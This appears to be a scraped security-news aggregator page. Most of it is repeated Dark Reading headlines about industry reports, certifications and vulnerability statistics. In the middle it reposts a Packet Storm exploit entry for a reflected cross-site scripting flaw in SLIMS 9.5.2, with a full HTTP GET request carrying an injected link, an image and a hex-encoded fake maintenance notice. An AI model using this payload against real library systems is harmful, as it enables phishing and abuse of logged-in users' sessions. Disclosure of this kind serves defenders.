Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
The Media Industry Is the Most Vulnerable to Cyber Attacks, Report Shows
The report highlights concerning security stats following two years of extreme tech growth.
The Media Industry Is the Most Vulnerable to Cyber Attacks, Report Shows
The report highlights concerning security stats following two years of extreme tech growth.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
SynSaber Releases ICS Vulnerabilities & CVEs Report Covering Second Half of 2022
ICS/OT cybersecurity firm finds 35% of CVEs in second half of 2022 unpatchable.
SynSaber Releases ICS Vulnerabilities & CVEs Report Covering Second Half of 2022
ICS/OT cybersecurity firm finds 35% of CVEs in second half of 2022 unpatchable.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
SecurityGen Identifies the Cybersecurity Priorities for Mobile Operators in 2023
Open architecture, non-standalone roaming, nation-state attacks, ransomware, and the need for more industry collaboration are among the major 5G security challenges that operators must address in the year ahead.
SecurityGen Identifies the Cybersecurity Priorities for Mobile Operators in 2023
Open architecture, non-standalone roaming, nation-state attacks, ransomware, and the need for more industry collaboration are among the major 5G security challenges that operators must address in the year ahead.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
KnowBe4 to Offer $10,000 Women in Cybersecurity Scholarship and (ISC) 2 Certification Education Package
KnowBe4 partners with the Center for Cyber Safety and Education to bolster women
in cybersecurity for the fourth consecutive year.
KnowBe4 to Offer $10,000 Women in Cybersecurity Scholarship and (ISC) 2 Certification Education Package
KnowBe4 partners with the Center for Cyber Safety and Education to bolster women
in cybersecurity for the fourth consecutive year.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
International Council of E-Commerce Consultants Launches Cybersecurity Essentials Professional Certificate Program on edX
New program enables students and early career professionals to learn critical skills required in today's entry-level cybersecurity field, helping address urgent cyber workforce jobs gap.
International Council of E-Commerce Consultants Launches Cybersecurity Essentials Professional Certificate Program on edX
New program enables students and early career professionals to learn critical skills required in today's entry-level cybersecurity field, helping address urgent cyber workforce jobs gap.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
New Research From EMA Reveals How Organizations Are Struggling to Develop Secure Software Applications
Research shows that over 50% of organizations performing software development
struggle with fully integrating security into their software development
lifecycle.
New Research From EMA Reveals How Organizations Are Struggling to Develop Secure Software Applications
Research shows that over 50% of organizations performing software development
struggle with fully integrating security into their software development
lifecycle.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
SLIMS 9.5.2 Cross Site Scripting
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
SLIMS 9.5.2 Cross Site Scripting
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.
SHA-256 |
c2cfbdfc13f8b70f7d45ae3cde6d617c90d3d1c17d4ef721231c9ca6b7bbf8a3Download
## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit
## Development: nu11secur1ty
## Date: 01.19.2023
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2
## Description:
The value of manual insertion `point 3` is copied into the HTML
document as plain text between tags.
The payload udz21rk346 was submitted in
manual insertion point 3.
This input was echoed unmodified in the application's response.
The attacker can trick the already logged-in user, to visit the
exploit link that this attacker is created,
and if this already logged-in user is not actually IT or admin, this
will be the end of this system.
## STATUS: HIGH Vulnerability
[+] Exploit:
```
GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27
HTTP/1.1
Host: pwnedhost1.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;
SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4
Connection: close
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)
## Proof and Exploit:
[href](https://streamable.com/zd6e18)
## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting)
Source:packetstormsecurity.com
Hacking with cURL: Unleash the CLI beast
Curl, or client URL is a command line tool that enables data exchange between a device and a server through a terminal. We can use this…Continue reading on Medium »
Read more...
Curl, or client URL is a command line tool that enables data exchange between a device and a server through a terminal. We can use this…Continue reading on Medium »
Read more...